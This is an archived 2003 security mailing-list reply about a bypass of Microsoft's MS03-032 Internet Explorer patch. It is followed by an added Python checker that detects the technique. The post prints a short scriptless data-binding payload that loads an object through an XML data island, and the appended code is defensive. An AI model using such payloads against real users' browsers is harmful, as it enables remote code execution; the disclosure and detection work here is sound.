[VulnWatch] RE: BAD NEWS: Microsoft Security Bulletin MS03-032

From: GreyMagic Software (security_at_greymagic.com)
Date: 09/08/03

  • Next message: Marc Maiffret: "[VulnWatch] EEYE: Microsoft RPC Heap Corruption Vulnerability - Part II"
    To: "NTBugtraq" <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>, "Bugtraq" <bugtraq@securityfocus.com>, <full-disclosure@lists.netsys.com>, <vulnwatch@vulnwatch.org>
    Date: Mon, 8 Sep 2003 16:52:12 +0200

    >The patch for Drew's object data=funky.hta doesn't work:

    This is the exact same issue as http://greymagic.com/adv/gm001-ie/, which
    explains the problem in detail. Microsoft again patches the object element
    in HTML, but it doesn't patch the dynamic version of that same element.

    >1. Disable Active Scripting

    This actually means that no scripting is needed at all in order to exploit
    this amazingly critical vulnerability:

    <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
    <xml id="oExec">
        <security>
            <exploit>
                <![CDATA[
                <object data=x.asp></object>
                ]]>
            </exploit>
        </security>
    </xml>

    Ouch.
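A defensive content-inspection check for the scriptless data-binding pattern shown in the post, added here as an example and not code from the original message or from GreyMagic: it collects elements bound with dataformatas="html", resolves the referenced <xml> data island, and flags bound fields whose content (CDATA included) carries an object, embed, applet, iframe or script tag. The parser classes, the island lookup and the sample input are assumptions constructed for this example; the sample reuses the post's binding and adds a harmless text-bound island to show it is not flagged.

```python
import re
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

# Tags that load active content when a bound field is rendered as HTML.
ACTIVE_TAGS = ("object", "embed", "applet", "iframe", "script")

class _BindingCollector(HTMLParser):
    """Collect (datasrc id, datafld) pairs bound with dataformatas="html"."""
    def __init__(self):
        super().__init__()
        self.bindings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("dataformatas", "").lower() == "html" and "datafld" in a:
            self.bindings.append((a.get("datasrc", "").lstrip("#"), a["datafld"]))

def _data_islands(html):
    """Map each <xml id=...> data island id to its raw inner markup (constructed helper)."""
    pat = r"<xml\s[^>]*?\bid\s*=\s*[\"']?([\w-]+)[\"']?[^>]*>(.*?)</xml>"
    return {m.group(1): m.group(2) for m in re.finditer(pat, html, re.I | re.S)}

def find_html_bound_active_content(html):
    """Return (island id, field, tag) for every HTML-bound field carrying an active tag."""
    collector = _BindingCollector()
    collector.feed(html)
    islands = _data_islands(html)
    findings = []
    for src, field in collector.bindings:
        try:
            root = ET.fromstring(islands.get(src, ""))
        except ET.ParseError:  # unknown island or malformed XML: nothing to inspect
            continue
        for el in root.iter():
            if el.tag.lower() != field.lower() or not el.text:
                continue
            for tag in ACTIVE_TAGS:  # CDATA arrives as plain text, so scan it for markup
                if re.search(r"<\s*" + tag + r"\b", el.text, re.I):
                    findings.append((src, field, tag))
    return findings

# Constructed sample: the post's binding pattern plus a harmless text-bound island.
SAMPLE = """
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec"><security><exploit><![CDATA[<object data=x.asp></object>]]></exploit></security></xml>
<span datasrc="#oNote" datafld="msg" dataformatas="text"></span>
<xml id="oNote"><row><msg>hello</msg></row></xml>
"""
```

Running find_html_bound_active_content(SAMPLE) reports only the oExec/exploit field as carrying an object tag; a gateway or mail filter that already inspects inline script would otherwise pass this markup untouched.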

